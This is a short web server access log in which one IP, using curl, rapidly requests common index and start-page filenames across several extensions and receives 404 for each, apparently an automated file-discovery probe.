143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /base.asp HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /inicio.html HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /start.php HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /base.inc HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:26 +0100] "GET /base.jhtml HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /index.jsa HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /index.jhtml HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /start.aspx HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /start.jhtml HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /start.shtml HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:27 +0100] "GET /default.html HTTP/1.1" 404 372 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /admin.shtml HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /base.cfm HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /base.aspx HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /robots.txt HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /start.jsa HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:28 +0100] "GET /menu.cfm HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /indice.pl HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /default.cgi HTTP/1.1" 404 371 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /indice.php HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /index.cfm HTTP/1.1" 404 369 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /main.jsa HTTP/1.1" 404 368 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /inicio.jsp HTTP/1.1" 404 370 "-" "curl/7.54.0"
143.42.63.237 - - [22/Dec/2024:16:56:29 +0100] "GET /home.cgi HTTP/1.1" 404 368 "-" "curl/7.54.0"
